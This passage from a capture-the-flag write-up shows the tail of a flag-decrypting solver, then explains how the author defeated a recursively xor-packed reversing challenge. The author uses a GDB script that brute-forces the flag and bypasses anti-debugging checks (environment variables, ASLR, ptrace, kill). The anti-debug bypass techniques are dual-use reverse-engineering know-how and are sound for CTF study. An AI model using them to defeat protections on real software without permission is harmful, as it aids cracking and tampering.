    d = (v & 0x0000_0000_0fff_0000) >> (64 - 48)
    e = (v & 0x0000_0000_0000_fff0) >> (64 - 60)
    f = (v & 0x0000_0000_0000_000f)
    b ^= a
    c ^= b
    d ^= c
    e ^= d
    f ^= e >> 8
    o = f
    o |= e << (64 - 60)
    o |= d << (64 - 48)
    o |= c << (64 - 36)
    o |= b << (64 - 24)
    o |= a << (64 - 12)
    return o

with open("beginners-rev-2023.exe", "rb") as f:
    f.seek(0x3040)
    enc = f.read(0x200)

enc = list(map(u64, chunks(enc, 8)))
for i in range(64):
    enc[i] = rev_shift(enc[i])

enc = flat(enc, map=p64)
enc = rc4.crypt(enc)

enc = list(map(u64, chunks(enc, 8)))
for i in range(64):
    enc[i] = rev_shift(enc[i])

flag = flat(enc, map=p64)
print(flag)

[Reversing easy] T the weakest

The program is packed with a simple xor encoder. The decoded code is written to a memory file and is executed with execv system call. Reading the unpacked code, we can easily find out that it's another packed code. So, we need to automate unpacking this recursively-packed program.

XOR decoder

One thing to note is that the program checks our input character by character in each phase of the unpack. If the character is invalid, the program immediately exits and no more unpacking occurs.

The first program is checking the first byte of the flag

Fortunately, each stage checks a single character, which means that we can bruteforce it.

I thought of automating it with Qiling, but Qiling is so outdated that, for over a year, it has been unable to run even a simple executable built for recent versions of Linux. I used a GDB script instead.

There are three obstacles in automating the solver.

Firstly, from the 22nd character, the program starts checking LINES and COLUMNS environment variables, which are added by GDB.

We can simply unset them to bypass the check.

gdb.execute("unset environment LINES")
gdb.execute("unset environment COLUMNS")

Secondly, from the 27th character, it checks the return value of malloc.

This calculation checks whether ASLR is enabled, and GDB disables ASLR by default. Let's turn ASLR back on.

gdb.execute("set disable-randomization off")

The last obstacle, from the 60th character, is a ptrace check to detect the debugger.

We cannot simply modify the return value of ptrace because some of the calls must succeed while others must fail. It looks like ptrace must succeed if a jnz instruction follows, and must fail if a jz instruction follows. I checked the instructions following the ptrace call to bypass the check.

gdb.execute("break ptrace")
gdb.execute("break kill")
...
    where = gdb.execute("i sym $rip", to_string=True)
    if "ptrace in section" in where:
        gdb.execute("finish")
        insn = gdb.execute("x/4i $rip", to_string=True)
        if "jne" not in insn:
            gdb.execute("set $rax=0")

Additionally, it tries to send a signal to the parent process. Let's disable it by changing the PID argument.

    elif "kill in section" in where:
        gdb.execute("set $edi=12345678")

Here is the final script:

import gdb

gdb.execute("unset environment LINES")
gdb.execute("unset environment COLUMNS")
gdb.execute("set disable-randomization off")
gdb.execute("start m")
gdb.execute("break ptrace")
gdb.execute("break kill")
gdb.execute("break puts")
gdb.execute("break write")
while True:
    gdb.execute("conti")

    where = gdb.execute("i sym $rip", to_string=True)
    if "ptrace in section" in where:
        gdb.execute("finish")
        insn = gdb.execute("x/4i $rip", to_string=True)
        if "jne" not in insn:
            gdb.execute("set $rax=0")

    elif "kill in section" in where:
        gdb.execute("set $edi=12345678")

    elif "write in section" in where:
        gdb.execute("dump binary memory 102.bin $rsi $rsi+$rdx")
        print("RESULT: OK")
        break

    else:
        print("RESULT: NG")
        break

gdb.execute("quit")

Overall impressions

I liked moratorium's challenges, except for the OCaml one. Where are smallkirby's challenges?